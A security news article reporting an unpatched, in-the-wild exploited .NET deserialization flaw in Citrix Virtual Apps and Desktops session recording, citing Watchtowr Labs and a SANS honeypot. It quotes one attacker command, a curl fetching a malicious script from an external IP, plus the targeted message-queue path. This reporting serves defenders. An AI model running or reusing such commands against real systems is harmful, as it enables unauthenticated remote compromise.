Citrix Virtual Apps & Desktops Zero-Day Vulnerability Exploited in the Wild

A critical new vulnerability has been discovered in Citrix’s Virtual Apps and Desktops solution, which is widely used to facilitate secure remote access to desktop applications now exploited in the wild.

The vulnerability, which remains unpatched, was detailed last week by Watchtowr Labs in a blog post . This flaw poses a significant threat, as the solution is frequently used in environments like call centers to isolate individual workstations from actual desktops, particularly in remote work setups.

Vulnerability Details

Citrix Virtual Apps and Desktops provide remote users access to full desktop environments from various devices, including laptops, tablets, and smartphones.

However, Watchtowr Labs warns that the same technology could be exploited by malicious actors, including ransomware groups. The problem lies in how all desktops are hosted on a single server, meaning a privilege escalation exploit could compromise not just one desktop but the entire server and all active sessions connected to it.

One particularly concerning aspect of Citrix’s solution is its session recording feature. Citrix allows administrators to record user sessions for later review, but the review process relies on a vulnerable .NET deserialization function.

This vulnerability is exploitable without requiring authentication, making it a prime target for cybercriminals. Watchtowr Labs has published proof-of-concept exploit code on GitHub , making it accessible to anyone.

Maximizing Cybersecurity ROI: Expert Tips for SME & MSP Leaders - Attend Free Webinar

Sample Exploit Details

According to SANS report, A sample exploit observed recently highlights the seriousness of the vulnerability. In a honeypot environment, a POST request was sent to a Citrix system, attempting to execute a command that fetched a malicious script from an external server.

The exploit took advantage of a messaging queue used by Citrix (msmq/private$/citrixsmaudeventdata) and sought to execute the following command:

curl http://91.212.166.60/script_xen80-mix.php

Attempts to access the malicious script led to a 404 error, raising speculation that the attacker may be filtering requests based on IP addresses or collecting IP addresses for future attacks.

The attack originated from IP address 192.143.1.40, which is linked to an ISP in Johannesburg, South Africa.

The unpatched vulnerability in Citrix Virtual Apps and Desktops poses a severe risk to organizations relying on the platform for remote access.

Since the exploit allows attackers to execute commands remotely without authentication, it could lead to widespread system compromise. The fact that all desktops are hosted on the same server exacerbates the issue, as an attacker gaining control of one session could potentially control all connected sessions.

Citrix has not yet released a patch for this vulnerability, and organizations using the affected product should be on high alert.

In the meantime, Watchtowr Labs advises organizations to monitor for unusual activity, especially from unfamiliar IP addresses, and to consider implementing additional security measures to mitigate the potential impact of this vulnerability.

Simplify and speed up Threat Analysis Workflow by Auto-detonating Cyber Attacks in a Malware sandbox